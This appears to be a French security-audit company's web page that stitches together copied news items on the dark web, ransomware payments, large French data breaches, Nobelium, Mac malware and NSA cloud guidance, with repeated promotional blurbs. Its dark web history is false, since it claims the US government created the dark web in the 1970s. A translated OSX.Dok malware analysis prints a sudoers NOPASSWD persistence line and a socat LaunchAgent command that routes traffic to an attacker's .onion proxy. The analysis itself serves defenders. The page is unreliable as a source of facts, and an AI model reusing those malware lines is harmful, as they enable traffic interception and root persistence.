C’EST QUOI LE DARK WEB en 2024? On pourrait définir le dark web comme la face sombre d’Internet. Inaccessible par les moteurs de recherche traditionnels comme Google, Bing ou Yahoo et n’utilisant pas non plus un navigateur couramment employé comme Chrome. Contrairement au web visible de tous, le dark web est quant à lui constitué de sites, de forums, de marchés et d’autres services en ligne qui ne sont pas indexés et qui sont cachés derrière des réseaux privés, des systèmes de cryptage et d’autres outils de confidentialité. Le contenu est accessible via des réseaux privés tels que Tor (The Onion Router) ou I2P (Invisible Internet Project), qui permettent l’anonymat de l’utilisateur en cryptant les données de connexion et en masquant l’adresse IP. C’est pourquoi, il est souvent associé à des activités illégales. Il peut être employé pour acheter et vendre des drogues, des armes, des logiciels malveillants, des informations personnelles et d’autres biens illégaux. Pourtant, à l’origine, le « web caché » (son autre nom) avait été développé pour un tout autre usage. Créé dans les années 1970 par le gouvernement américain, son but était de permettre à ses espions d’échanger en restant anonymes et intraçables. Vingt ans plus tard, les ingénieurs de l’US Army en dévoilant ses contours, ont permis au grand public d’en bénéficier et donc de l’utiliser. Si aujourd’hui, le dark web permet de l’échange d’information par des populations, des journalistes ou des activistes dans des pays où la censure est forte, des dérives ont rapidement été constatées avec une cybercriminalité largement développée. En raison de son caractère anonyme et de l’absence de réglementation, le dark web est considéré comme un endroit dangereux. En 2024, le Dark Web désigne toujours la partie non indexée de l'internet accessible via des réseaux anonymes, tels que Tor, I2P ou Freenet. Cette partie de l'internet n'est pas facilement accessible via les navigateurs conventionnels et nécessite souvent des logiciels spécifiques et une connaissance technique pour y accéder. Le Dark Web continue d'être associé à diverses activités illicites, telles que la vente de drogues, d'armes, de données volées, ainsi que des forums et des marchés pour des activités criminelles. Cependant, il est important de noter que le Dark Web n'est pas exclusivement utilisé à des fins criminelles. Il est également utilisé par des journalistes, des militants des droits de l'homme et d'autres personnes soucieuses de leur vie privée pour communiquer de manière sécurisée et anonyme. Les autorités et les entreprises de cybersécurité continuent de surveiller le Dark Web pour détecter et prévenir les activités illicites, mais son caractère anonyme et décentralisé rend souvent difficile l'application de la loi dans cet environnement. Malgré les efforts pour combattre les activités criminelles sur le Dark Web, il reste un défi constant pour les forces de l'ordre et les défenseurs de la sécurité en ligne. Audit de sécurité de votre site Internet. En quoi consiste cette prestation d’analyses et de conseils de sécurité de site Internet? En un rapport complet sur les défaillances possibles de sécurité de votre site Internet. Suivant l’importance de votre site Internet le rapport d’Audit de Sécurité fera environ une quinzaine de page avec des explications accessibles pour tous. Comment ? Par de multiples analyses et vérifications Des tests d’attaques Des contrôles de structures Et suite à nos investigations, nous vous apportons des conseils pour améliorer votre sécurité de site Internet. Analyse-de-la-sécurité-web Audit de la Configuration de Sécurité  Test de Vulnérabilité :Analyse des Certificats SSL/TLS  Gestion des Accès et des Identités  Sécurité des Applications Web (WAF)  Protection contre les Injections SQL et XSS  Analyse des Fichiers Log  Gestion des Mises à Jour de Sécurité  Protection contre les Attaques DDoS  Sécurité des Données  Information à la Sécurité 

Cyberattaques-2023, Un montant record de 1,1 Md$ versé en rançons Les attaques par rançongiciels n'ont pas fini de faire parler d'elles. Et avec elles leurs salves de montants de plus en plus astronomiques : c'est en tout cas ce qui ressort de la dernière enquête de Chainalaysis sur le sujet qui évalue chaque année les sommes payées à des pirates par des victimes d'attaques par rançongiciels. Après un trou d'air en 2022 avec 567 M$, les montants extorqués dans le cadre de ces campagnes malveillantes sont nettement repartis à la hausse, atteignant la somme pharaonique de 1,1 Md$. Soit un niveau jamais vu jusqu'alors à comparer aux 983 M$ de 2021, 905 M$ de 2020 et 220 M$ de 2019. « L'année 2023 marque un retour en force des ransomwares, avec des paiements records et une augmentation substantielle de la portée et de la complexité des attaques - un renversement significatif par rapport à la baisse observée en 2022 », fait savoir Chainanalysis. Après une année 2022 marquée par le début d'événements géopolitiques majeurs - à commencer par la guerre en Ukraine - la tendance haussière des montants récoltés grâce à des ransomwares est donc repartie de plus belle. Le fournisseur reconnait toutefois que son travail de collecte d'informations relatives aux paiements effectués commence à devenir de plus en plus ardue : « Le paysage des ransomwares est non seulement prolifique mais aussi en constante expansion, ce qui rend difficile le suivi de chaque incident ou la traçabilité de tous les paiements de rançon effectués en crypto-monnaies », avance Chainanalysis. Cyberattaques fréquences et volumes d'attaques en hausse Dans son rapport, le fournisseur pointe en 2023 une escalade majeure dans la fréquence, la portée et le volume des attaques menées par une grande variété d'acteurs, allant de grands organismes et réseaux du cybercrime organisé à des cybergangs plus petits mais non moins performants, voire à des individus agissant pour leur propre compte. Police et justice en embuscade Parmi les autres indicateurs de l'étude, on retiendra que les rançons aux montants d'un million de dollars ou ont progressé de façon significative depuis 2021. Alors qu'en juillet 2021 un peu plus de 55 % des rançons demandées étaient compris dans cette fourchette, elles sont désormais plus de 75 % à être égales ou supérieures à 1 M$. « ALPHV-BlackCat est également une souche RaaS comme Phobos, mais elle est plus sélective dans les affiliés qu'elle autorise à utiliser ses logiciels malveillants, recrutant et interrogeant activement les candidats potentiels pour leurs capacités de piratage. Cela permet au groupe d'attaquer des cibles plus importantes pour des sommes plus élevées », explique Chainanalysis. Letsgo-web.fr l'un des meilleurs fournisseurs du web Si la situation est grave elle n'est pour autant pas désespérée avec notamment plusieurs gros coups portés aux cybergangs ces derniers mois avec le démantèlement de plusieurs réseaux malveillants et quelques victoires des autorités judiciaires et des forces de police à signaler. « Le démantèlement de Hive et la perturbation de BlackCat sont deux excellents exemples de la façon dont le FBI a donné la priorité à l'assistance aux victimes, en aidant les victimes et en imposant des coûts aux mauvais acteurs », fait savoir Chainanalysis.    à des solutions personnalisé pour votre sécurité de site Internet. Rapport D’Analyse, Et De Conseils De La Sécurité De Votre Site Internet actions de cybersécurité à surveiller Audit de sécurité de votre site Internet. [caption id="attachment_6048" align="alignleft" width="858"] Didier Turquet Fondateur[/caption] En quoi consiste cette prestation d’analyses et de conseils de sécurité de site Internet? En un rapport complet sur les défaillances possibles de sécurité de votre site Internet. Suivant l’importance de votre site Internet le rapport d’Audit de Sécurité fera environ une quinzaine de page avec des explications accessibles pour tous. Comment ? Par de multiples analyses et vérifications

Des tests d’attaques Des contrôles de structures Et suite à nos investigations, nous vous apportons des conseils pour améliorer votre sécurité de site Internet. Analyse-de-la-sécurité-web, les meilleures actions cybersécurité, la cybersécurité en entreprise Audit de la Configuration de Sécurité  Test de Vulnérabilité :Analyse des Certificats SSL/TLS  Gestion des Accès et des Identités  Sécurité des Applications Web (WAF)  Protection contre les Injections SQL et XSS  Analyse des Fichiers Log  Gestion des Mises à Jour de Sécurité  Protection contre les Attaques DDoS  Sécurité des Données  Information à la Sécurité  Plan d’Action en Cas d’Incident  Rapport est réalisé sous 3 à 5 jours ouvrés. Pour plus de précisions sur ce Rapport d’Analyse de Sécurité, et de conseils de votre site Internet, regardez en dessous dans le détail des descriptions.

Cyberattaque de la sécurité sociale Cyberattaque : cinq questions sur le piratage massif de nos données de santé Société. "Plus de 33 millions" de Français sont concernés par un vol de données lors d’une cyberattaque menée contre des gestionnaires du tiers payant, a révélé la Cnil, mercredi 7 février. Etat civil, numéro de sécurité sociale, informations sur la mutuelle : "plus de 33 millions" de Français sont concernés par un vol de données lors d’une cyberattaque contre des gestionnaires du tiers payant, a révélé mercredi la Cnil. Comment ce piratage s’est-il produit ? Deux sociétés servant d’intermédiaires entre les professionnels de santé – médecins, pharmaciens, opticiens, etc. – et les complémentaires santé ont été la cible d’une attaque : Viamedis (détenue notamment par les complémentaires Malakoff Humanis et VYV) et Almerys. Ce sont les opérateurs qu’un professionnel de santé interroge pour savoir s’il peut accorder ou non le tiers payant à un assuré social. L’attaque s’est faite par l’usurpation des identifiants et des mots de passe de professionnels de santé. L’alerte a été donnée le 1ᵉʳ février par Viamedis, qui a détecté l’attaque, déconnecté sa plateforme de gestion dès la découverte de l’intrusion et averti les autres plateformes de tiers payant. Quelques jours plus tard, Almerys a annoncé avoir également détecté une intrusion. Le directeur général de Viamedis, Christophe Candé, a expliqué qu’il s’agissait non pas d’une attaque par "rançongiciel", mais d’une intrusion dans la plateforme. "Le compte d’un professionnel de santé a été hameçonné", a-t-il révélé. Almerys et Viamedis n’ont publié aucune information permettant de comprendre si les attaques avaient simplement pour but de voler des données ou si elles pouvaient viser d’autres objectifs, comme implanter un rançongiciel. Viamedis a par ailleurs déposé une plainte auprès du procureur de la République. Les autres grandes plateformes de tiers payant ne semblent pas avoir été touchées, selon des informations recueillies par l’AFP auprès notamment de SP Santé (filiale de Cegedim) et d’Actil (filiale d’Apicil). Quelles sont les données concernées ? "Plus de 33 millions de personnes [sont concernées par une violation de données, qui comprend] pour les assurés et leur famille : l’état civil, la date de naissance et le numéro de sécurité sociale, le nom de l’assureur santé ainsi que les garanties du contrat souscrit", a précisé dans un communiqué la Cnil. LIRE AUSSI : Secrets industriels volés, données détruites... L'interminable cauchemar des cyber-défenseurs Mais, selon le gendarme de la vie privée numérique, "les informations bancaires, les données médicales, les remboursements de santé, les coordonnées postales, les numéros de téléphone, [ou encore les adresses électroniques] ne seraient pas concernés". Quels sont les risques de cette Cyberattaque de la sécurité sociale? Selon des spécialistes de la cybersécurité interrogés ces derniers jours par l’AFP, les données exposées n’ont pas une grande valeur en tant que telles, mais peuvent éventuellement servir à de futures cyberattaques. "Ça ne vaut pas grand-chose, comme données, il faudrait qu’il y ait aussi au moins un e-mail et un numéro de téléphone [pour qu’elles permettent de monter des attaques rapidement]", assure Damien Bancal, grand observateur du marché noir de la donnée volée et animateur de Zataz.com, un site français d’information traitant principalement de la délinquance informatique. LIRE AUSSI : Vol de données, attaque incontrôlable... Les cyber-risques des voitures nouvelle génération Tamim Couvillers, analyste de la société de cybersécurité Vade, confirme que ces données ont peu de valeur marchande, mais avertit qu’elles "peuvent vite être croisées avec d’autres fichiers". Ainsi, souligne-t-il, avoir le numéro de sécurité sociale de sa cible "permet de donner de la crédibilité à un courriel de phishing [hameçonnage]", consistant à inciter l’internaute de cliquer sur un lien malveillant.

"C’est de la donnée fraîche", a également commenté l’expert en cybersécurité Gérôme Billois, de la société Wavestone. Que peuvent faire les personnes concernées ? Pour savoir si des informations vous concernant, particulièrement votre numéro de sécurité sociale, sont potentiellement dans la nature, il est possible de se rendre sur le site Resopharma.fr. Ce site permet de savoir si votre assurance santé est gérée par l’un de ces deux prestataires concernant le tiers payant. La Cnil conseille aux personnes victimes de ce vol de données "d’être prudent [es] sur les sollicitations [qu’elles peuvent] recevoir, en particulier si elles concernent des remboursements de frais de santé, [mais aussi] de vérifier périodiquement les activités et mouvements sur [leurs] différents comptes". "[Il est en effet] possible que les données ayant fait l’objet de la violation soient couplées à d’autres informations provenant de fuites de données antérieures". LIRE AUSSI : Cyberattaques : "Un dossier médical se revend 350 euros sur le dark web" En outre, en cas de doute, il est conseillé de changer le mot de passe de l’adresse e-mail associée à sa mutuelle et à son espace personnel sur Ameli. "Le numéro de sécurité sociale est unique. On ne peut pas le changer. En revanche, le mot de passe associé doit aussi être unique. Vous devez le modifier par sécurité, afin d’éviter que quelqu’un ne rentre dans votre compte, que ce soit celui de la mutuelle ou de votre service Ameli", explique à TF1 Luména Duluc, experte en cybersécurité et directrice du Club de la sécurité de l’information français (Clusif). Comment prévenir ce genre de piratages à l’avenir ? "Devant l’ampleur de la violation", la Cnil a annoncé qu’elle allait "mener très rapidement des investigations", notamment pour vérifier si les mesures de sécurité des opérateurs touchés par la cyberattaque étaient conformes à leurs obligations de protection des données. Elle a aussi appelé les complémentaires recourant à Viamedis et Almerys à informer "individuellement et directement" tous leurs assurés concernés, prévenant qu’elle s’assurera que ce soit fait "dans les plus brefs délais". Audit de Sécurité de site Internet Comment se préserver des pirates informatique. 100% des sites ont des failles de sécurité.  Audit de la Configuration de Sécurité  Analyse de la structuration des dossiers web  Analyse contre les Attaques DDoS  Analyse de la Sécurité des Données  Analyse des Injections SQL et XSS  Analyse de la Confidentialité des Données  Analyse des Certificats SSL/TLS  Analyse de la Conformité aux Normes de Sécurité  Analyse des Risques Juridiques  Analyse de l'éligibilité sur les moteurs de recherche  Plan d’Action en Cas d’Incident  Conseils des Accès et des Identités  Conseils personnalisés Commander Le 1 er Rapport est réalisé sous 3 à 5 jours ouvrés.

Une cyberattaque sur France Travail compromet 43 millions de comptes Le successeur de Pôle Emploi, France Travail, vient d'annoncer avoir été victime d'une cyberattaque accompagnée d'un vol de données. Au total, les informations personnelles de 43 millions de personnes sont potentiellement impactées. France Travail a été victime d'une cyberattaque entraînant un vol de données impactant plusieurs millions de données personnelles. (Crédit Photo: DR) Après les perturbations sur les services de l’Etat en début de semaine, c’est une affaire plus importante qui mobilise les experts en cybersécurité. En effet, France Travail (anciennement Pôle Emploi) a publié un communiqué précisant avoir été victime - avec le réseau Cap Emploi - d’une cyberattaque. L’organisme ne donne pas de détail sur le type d’attaques, mais elle souligne qu’elle s’est accompagnée d’un vol de données personnelles. Les enquêtes ont montré que plusieurs informations confidentielles ont été compromises : nom et prénom, date de naissance, numéro de sécurité sociale, identifiant France Travail, adresses mail et postale et numéros de téléphone. France Travail précise rapidement que les mots de passe et les données bancaires utilisées pour l’indemnisation ne sont pas concernés par la cyberattaque. 43 millions de personnes concernées Plus inquiétant, le nombre de personnes concernées par cette violation de données est énorme. La base dérobée comprend en effet « les données personnelles d’identification des personnes actuellement inscrites, des personnes précédemment inscrites au cours des 20 dernières années ainsi que des personnes non inscrites sur la liste des demandeurs d'emploi mais ayant un espace candidat sur francetravail.fr. ». Au total, c’est 43 millions de personnes qui sont « potentiellement » concernées. France Travail a notifié l’incident de sécurité à la Cnil et a déposé plainte. Une enquête a été ouverte par le Parquet de Paris. Par ailleurs, l’organisme annonce la mise en place d’une plateforme téléphonique le 39 49 pour un accompagnement des personnes si besoin. Communiqué de France Travail [video width="640" height="360" mp4="https://defender.actions-web.com/wp-content/uploads/2024/03/code-source-video_-_77082-360p.mp4"][/video] Une cyberattaque sur France Travail Conformément à nos obligations au titre du Règlement général sur la protection des données (RGPD), nous avons procédé à une notification auprès de la CNIL et avons par ailleurs ce jour déposé plainte auprès des autorités judiciaires. Compte tenu des investigations techniques menées, les données personnelles d’identification exposées sont les suivantes : nom et prénom, date de naissance, numéro de sécurité sociale, identifiant France Travail, adresses mail et postale et numéros de téléphone. Les mots de passe et les coordonnées bancaires ne sont pas concernés par cet acte de cybermalveillance. Il n’existe donc aucun risque sur l’indemnisation. La base de données qui aurait été extraite de façon illicite contient les données personnelles d’identification des personnes actuellement inscrites, des personnes précédemment inscrites au cours des 20 dernières années ainsi que des personnes non inscrites sur la liste des demandeurs d'emploi mais ayant un espace candidat sur francetravail.fr. C’est donc potentiellement les données personnelles de 43 millions de personnes qui ont été exfiltrées. Face à cet acte de cybermalveillance, nous recommandons aux personnes la plus grande vigilance quant aux risques d'hameçonnage (mails ou appels frauduleux) ou de tentatives d'usurpation d'identité. Nous leur rappelons de ne jamais communiquer leur mot de passe ou leurs coordonnées bancaires par téléphone ou par mail: France Travail comme les autres organismes publics ne le demandent jamais. Une enquête préliminaire a été ouverte par le Parquet de Paris et confiée à la Brigade de Lutte Contre la Cybercriminalité de la Direction de la Police Judiciaire de Paris qui a mis en place un système de plainte simplifiée pour les personnes concernées accessible à l’adresse suivante : https://www.

cybermalveillance.gouv.fr/tous-nos-contenus/actualites/violation-de-donnees-personnelles-france-travail-formulaire-lettre-plainte-202403. Conscients des conséquences que cela peut engendrer, nous informerons via leur espace personnel ou par mail l’ensemble des personnes identifiées auxquelles nous présentons bien évidemment nos excuses. Un dispositif d’information dédié sera également disponible dans les prochaines heures via la plateforme téléphonique 39 49 afin d’accompagner tous ceux qui en auraient besoin. La sécurité des données confiées par les demandeurs d’emploi et les entreprises est une préoccupation constante pour nous. Face à la menace de cyber attaques qui pèse de plus en plus sur les entreprises et organisations au niveau national comme européen, nous nous devons de renforcer en continu nos dispositifs de protection, procédures et consignes. Aussi, dès la connaissance avérée de cette intrusion, nous avons pris des mesures complémentaires avec le réseau Cap emploi pour renforcer nos dispositifs de protection des accès à nos applicatifs par nos partenaires. Trouvez avec nous votre sécurité de site web

Le groupe Nobelium a piraté aussi du code source de Microsoft L'attaque menée par le groupe Nobelium aka Midnight Blizzard sur les messageries de dirigeants de Microsoft a aussi conduit à du vol de certains codes sources. Et ils essayent de les utiliser dans des attaques en cours. Dans le piratage des comptes de messagerie de dirigeants de Microsoft, le groupe Nobelium a aussi exflitré du code source de certains produits. (Crédit Photo: ThedigitalArtist/Pixabay) Au début de l’année 2024, Microsoft avait alerté sur une campagne de cyber-espionnage menée par un groupe aux multiples noms (Midnight Blizzard, Nobelium, Cozy Bear ou APT29). Cette offensive avait pour but d’accéder à des comptes de messagerie de dirigeants de Microsoft. Aujourd’hui, la firme de Redmond a diffusé une mise à jour de son enquête sur ces faits en soulignant que la campagne avait également conduit au vol de certains codes source et que les cybercriminels s’en servaient dans des attaques en cours. « Ces dernières semaines, nous avons constaté que Midnight Blizzard [Nobelium] utilisait des informations initialement exfiltrées de nos systèmes de messagerie d'entreprise pour obtenir, ou tenter d'obtenir, un accès non autorisé », souligne Microsoft dans un billet de blog. « Cela inclut l'accès à certains référentiels de code source de l'entreprise et à des systèmes internes. À ce jour, nous n'avons trouvé aucune preuve que les systèmes clients hébergés par Microsoft aient été compromis ». La société ne donne pas de détails sur les codes sources touchés, mais elle alerte sur le fait que le groupe affilié à la Russie, tente d’utiliser « des secrets de différents types qu'il a trouvés » pour aller plus loin dans le réseau de Microsoft et potentiellement de ses clients. « Certains de ces secrets ont été partagés entre des clients et Microsoft dans des courriels, et au fur et à mesure que nous les découvrons dans nos courriels exfiltrés, nous avons pris contact avec ces clients pour les aider à prendre des mesures d'atténuation », explique la firme.

Piratage des Mac Si vous pensez que le piratage concerne uniquement les utilisateurs de Windows, alors utilisateurs de Mac, croyez nous, vous n'êtes pas protégés. Par exemple, en 2017 a eu lieu une campagne d'hameçonnage visant les utilisateurs de Mac, principalement en Europe. Transporté par un cheval de Troie qui avait obtenu un certificat de développeur Apple valide, l'hameçonnage volait des identifiants en lançant une alerte en plein écran déclarant qu'une mise à jour essentielle d'OS X était en attente d'installation. Si le piratage fonctionnait, les malfaiteurs obtenaient un accès total à toutes les communications de la victime, leur permettant d'espionner toute la navigation sur le Web, même les connexions HTTPS avec une icône de verrouillage. En plus des attaques d'ingénierie sociale sur les Mac, la faille matérielle occasionnelle peut également créer des vulnérabilités, comme ce fut le cas avec les failles nommées Meltdown et Spectre que le journal The Guardian a signalées début 2018. Apple a répondu à ces failles de sécurité en développant des protections, mais a également conseillé à ses clients de télécharger les logiciels uniquement depuis des sources fiables, comme ses boutiques d'applications iOS et Mac, pour aider à empêcher les pirates informatiques de pouvoir exploiter les vulnérabilités du processeur. Puis il y a eu l'insidieuse Calisto, une variante du malware Proton Mac, qui s'est développée pendant deux ans avant d'être découverte en juillet 2018. Elle était dissimulée dans un faux programme d'installation de cybersécurité Mac, et parmi d'autres fonctionnalités, recueillait les noms d'utilisateur et les mots de passe. Donc entre les virus, les malwares et les failles de sécurité, les pirates informatiques ont créé des kits d'outil complets pour semer la pagaille sur votre Mac, le plus récent étant celui dont l'équipe Malwarebytes Labs parle ici. Prévention contre le piratage Si votre ordinateur, votre tablette ou votre téléphone est en première ligne des attaques de pirates, alors protégez-le avec des cercles de précaution concentriques. Pour commencer, téléchargez un produit anti-malware fiable (ou une application pour votre téléphone) qui peut à la fois détecter et neutraliser les malwares et bloquer les connexions aux sites d'hameçonnage malveillants. Bien sûr, que vous soyez sous Windows, Android ou Mac, sur un iPhone, ou sur un réseau d’entreprise, nous vous recommandons d'utiliser la protection multicouches de Malwarebytes for Windows, Malwarebytes for Android, Malwarebytes for Mac, Malwarebytes for iOS, et nos produits Malwarebytes pour les entreprises. Le nouveau malware OSX.Dok intercepte le trafic Web Publié par Thomas Reed La plupart des logiciels malveillants sur Mac ont tendance à être peu sophistiqués. Bien qu'il présente certains aspects plutôt bruts et gênants, un nouveau logiciel malveillant pour Mac, baptisé OSX.Dok, sort de ce moule typique. OSX.Dok, découvert par Check Point , utilise des moyens sophistiqués pour surveiller (et potentiellement modifier) ​​tout le trafic HTTP et HTTPS vers et depuis le Mac infecté. Cela signifie que le logiciel malveillant est capable, par exemple, de capturer les informations d'identification du compte de tout utilisateur du site Web auquel il se connecte, ce qui offre de nombreuses possibilités de vol d'argent et de données. De plus, OSX.Dok pourrait modifier les données envoyées et reçues dans le but de rediriger les utilisateurs vers des sites Web malveillants au lieu de sites légitimes. Méthode de distribution OSX.Dok se présente sous la forme d'un fichier nommé Dokument.zip , qui est envoyé aux victimes dans des e-mails de phishing . Les victimes se trouvent principalement en Europe. Si la victime tombe dans le piège de l'arnaque, le fichier ZIP est décompressé en un fichier nommé « Document », qui (curieusement) a reçu la même icône que les anciennes versions de l'application Aperçu d'Apple. Ce n'est pas la même chose qu'une icône donnée à un document qui peut être ouvert par Aperçu.

 De plus, l’icône est étrangement pixelisée, ce qui devrait déclencher des signaux d’alarme parmi les utilisateurs avertis. Analyse comportementale Ce « document » est bien entendu en réalité une application. Heureusement, lorsque l'utilisateur tente d'ouvrir cette application, macOS affichera une notification standard pour avertir l'utilisateur de ce fait : Apple a déjà révoqué le certificat utilisé pour signer l'application. Ainsi, à ce stade, toute personne rencontrant ce malware ne pourra pas ouvrir l'application et ne pourra pas être infectée par celui-ci. Si l'utilisateur clique au-delà de cet avertissement pour ouvrir l'application, celle-ci affichera un avertissement indiquant que le fichier n'a pas pu être ouvert, ce qui est simplement une couverture pour le fait qu'aucun document n'a été ouvert : Il est intéressant de noter que cette fenêtre ne peut pas être fermée car le bouton OK ne répond pas. De plus, l'application restera bloquée dans ce mode pendant un certain temps. Si l'utilisateur devient méfiant à ce stade et tente de forcer la fermeture de l'application, celle-ci n'apparaîtra pas dans la fenêtre Forcer à quitter les applications et dans le moniteur d'activité, elle apparaîtra sous le nom « AppStore ». Si l’utilisateur parvient à forcer la fermeture de cette application « AppStore », tout ne va pas encore bien. Le compte-gouttes de malware se sera copié dans le dossier /Users/Shared/ et s'ajoutera aux éléments de connexion de l'utilisateur afin qu'il se rouvre à la prochaine connexion pour continuer le processus d'infection de la machine. Après plusieurs minutes, l'application masquera tout l'écran avec une fausse notification de mise à jour. Celui-ci restera obstinément à l'écran et reviendra au redémarrage puisque le malware se trouve dans les éléments de connexion de l'utilisateur. Si l'utilisateur clique sur le bouton Mettre à jour tout, le logiciel malveillant demandera un mot de passe administrateur. Le malware restera dans ce mode pendant un certain temps, laissant l'ordinateur inutilisable pour l'utilisateur jusqu'à ce qu'il soit terminé. Ceci est assez différent de tout processus normal de mise à jour de macOS et quiconque connaît intimement macOS saura que quelque chose ne va pas, mais ceux qui ne le savent pas mieux pourraient facilement être trompés en pensant qu'il s'agit d'une procédure normale pour une mise à jour de sécurité importante. Une fois que l'utilisateur a fourni un mot de passe administrateur, le malware modifie le fichier /private/etc/sudoers , qui contrôle l'accès à la commande sudo dans le shell Unix. Une ligne comme celle-ci est ajoutée à la fin du fichier sudoers : test ALL=(TOUS) NOPASSWD: TOUS Cette ligne précise que l'utilisateur indiqué – « test » dans ce cas – est autorisé à utiliser sudo sans avoir besoin d'un mot de passe, garantissant ainsi que le logiciel malveillant peut continuer à disposer d'une autorisation au niveau racine sans continuer à demander un mot de passe administrateur. En attendant, il y a une très bonne raison à la longueur du temps d'installation : OSX.Dok sera occupé à utiliser ses privilèges root mal acquis pour installer toutes sortes de logiciels en arrière-plan, y compris les outils de développement en ligne de commande macOS, qui sont nécessaires pour l'installation. d'autres outils qu'il installera. Le malware installera également Homebrew, un système d'installation en ligne de commande. Homebrew sera, à son tour, utilisé pour télécharger et installer d’autres outils, notamment tor et socat. Le malware utilisera ces processus pour canaliser tout le trafic HTTP et HTTPS via un serveur proxy malveillant. Deux fichiers seront installés dans le dossier LaunchAgents de l'utilisateur pour rediriger ce trafic. Le premier d’entre eux, nommé  com.apple.Safari.pac.plist , a le contenu suivant : Rester en vie Étiquette com.apple.Safari.pac Arguments du programme /usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.

0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050 Exécuter à la charge Chemin d'erreur standard /dev/null Chemin de sortie standard /dev/null Directeur de travail /usr/local Le second, nommé  com.apple.Safari.proxy.plist , a le même contenu, sauf qu'il utilise le port 5588 à la place des ports 5555 et 80. En guise de coup de pied supplémentaire, OSX.Dok installe un nouveau certificat racine de confiance dans le système avec le nom « COMODO RSA Extended Validation Secure Server CA 2 ». Grâce à ce certificat, il peut usurper l’identité de n’importe quel site Web de manière convaincante, dans le cadre du processus de falsification du trafic Web. Une fois tout cela terminé, le malware se supprime de /Users/Shared/ , laissant derrière lui quelques signes évidents de sa présence. Le dossier LaunchAgents est le seul changement susceptible d'être remarqué par certains utilisateurs, et beaucoup ne comprendront pas que ces fichiers .plist ne sont pas réellement associés à Apple. Suppression La suppression du logiciel malveillant peut être réalisée en supprimant simplement les deux fichiers LaunchAgents susmentionnés , mais il existe de nombreux restes et modifications du système qui ne peuvent pas être aussi facilement annulés. Les modifications apportées au fichier sudoers doivent être annulées et un utilisateur averti peut facilement le faire à l'aide d'un bon éditeur de texte (comme BBEdit), mais apporter de mauvaises modifications à ce fichier peut entraîner de graves problèmes. Un fichier  LaunchAgents nommé homebrew.mxcl.tor.plist aura également été installé. Puisqu'il s'agit d'un fichier légitime, il ne devrait pas être détecté comme malveillant, mais les personnes qui ne l'ont pas déjà installé devraient le supprimer. Le mauvais certificat doit être supprimé du trousseau système à l'aide de l'application Trousseau Access (trouvée dans le dossier Utilitaires du dossier Applications.) Les nombreux outils de ligne de commande légitimes installés, constitués de dizaines de milliers de fichiers, ne peuvent pas être facilement supprimés. Mise à jour : Certaines variantes ultérieures de Dok ont ​​également modifié le fichier /etc/hosts. Cela doit être restauré à partir d'une sauvegarde ou modifié manuellement pour le ramener à l'état normal. Consommateurs Malwarebytes Anti-Malware pour Mac détectera les composants importants de ce malware comme OSX.Dok, désactivant ainsi l'infection active. Toutefois, en ce qui concerne les autres changements difficiles à inverser, qui introduisent des vulnérabilités et des changements potentiels de comportement, des mesures supplémentaires seront nécessaires. Pour les personnes qui ne connaissent pas le Terminal et les recoins obscurs du système, il serait sage de demander l'aide d'un expert, ou d'effacer le disque dur et de restaurer le système à partir d'une sauvegarde effectuée avant l'infection. Entreprises L’impact sur l’entreprise pourrait être bien plus grave, car cela pourrait exposer des informations susceptibles de permettre à un attaquant d’accéder aux ressources de l’entreprise. Par exemple, considérez les dommages potentiels si, pendant que vous êtes infecté, vous visitez une page interne de l’entreprise qui fournit des instructions sur la façon de vous connecter au VPN de l’entreprise et d’accéder aux services internes de l’entreprise. Le malware aurait envoyé toutes ces informations au serveur proxy malveillant. Si vous avez été infecté par ce malware dans un environnement professionnel, vous devez consulter votre service informatique afin qu'il puisse être conscient des risques et commencer à les atténuer.

NSA publie les dix meilleures pratiques pour les environnements cloud Les acteurs malveillants ciblent les environnements Cloud en raison de leur large acceptation et de leur stockage centralisé des informations importantes. L’exploitation des failles de la sécurité du cloud peut permettre un accès non autorisé à des données sensibles, des interruptions de l’infrastructure ou des revenus. Le fait que les systèmes soient hautement évolutifs et interconnectés en fait de bonnes cibles pour les cyberattaques. Les analystes en cybersécurité de la NSA ont récemment publié les dix meilleures pratiques de sécurité pour les environnements cloud. Dix meilleures pratiques pour les environnements cloud Les chercheurs de la NSA ont récemment publié des stratégies d'atténuation de la sécurité du cloud dans le but de sensibiliser les utilisateurs du cloud aux pratiques de sécurité importantes. Les acteurs malveillants ciblent principalement les utilisateurs du cloud lorsqu’ils transfèrent leurs données vers des environnements cloud. Le document contient 10 fiches d'information sur la cybersécurité (CSI), chacune se concentrant sur une approche distincte. Pour six des dix stratégies, la Cybersecurity and Infrastructure Security Agency (CISA) collabore avec la National Security Agency (NSA). Ci-dessous, nous avons mentionné les dix meilleures pratiques de sécurité pour les environnements cloud fournies par la NSA : - Respecter le modèle de responsabilité partagée du cloud : ce CSI enseigne un cadre cloud en clarifiant les responsabilités de sécurité du CSP et des clients dans la sécurisation de l'instance cloud de leur choix. Utiliser des pratiques sécurisées de gestion des identités et des accès dans le cloud (conjointement avec CISA) : ce CSI clarifie les menaces liées à la gestion des identités dans le cloud et suggère les meilleures pratiques pour les atténuer pour les organisations dans le cloud. Utiliser des pratiques sécurisées de gestion des clés dans le cloud (conjointement avec CISA) : ce CSI suggère des options de gestion des clés et les meilleures pratiques pour leur utilisation. Il souligne l’importance de comprendre les responsabilités partagées en matière de sécurité avec Cloud KMS. Implémenter la segmentation et le chiffrement du réseau dans les environnements cloud (conjointement avec CISA) : ce CSI conseille sur l'application de principes dans les environnements cloud distincts des réseaux sur site. La technologie cloud offre une infrastructure pour ZT sans appareils spécialisés. Il met principalement en évidence les meilleures pratiques utilisant les fonctionnalités cloud communes. Sécurisez les données dans le cloud (en collaboration avec CISA) : La sécurisation des données dans le cloud est cruciale à mesure que les organisations migrent. Comprendre la sensibilité des données, choisir un stockage approprié et appliquer des mesures de sécurité sont les facteurs clés. Ce CSI donne un aperçu et des pratiques de sécurisation et d'audit du stockage cloud. Défendre les environnements d'intégration continue/de livraison continue (conjointement avec CISA) : la NSA et la CISA proposent ce CSI pour améliorer les défenses DevSecOps du cloud. Il guide l'intégration de la sécurité dans les environnements DevOps CI/CD, en tirant parti des directives gouvernementales pour des déploiements cloud CI/CD robustes. Appliquez des pratiques de déploiement automatisées sécurisées grâce à une infrastructure telle que le code : IaC, lignes de base et images dorées, qui sont des modèles pour déployer des ressources sur site et dans le cloud. IaC automatise le déploiement à l'aide de code, y compris les politiques de sécurité. Les lignes de base et les images dorées fournissent des points de départ sécurisés. Tenir compte des complexités introduites par les environnements cloud 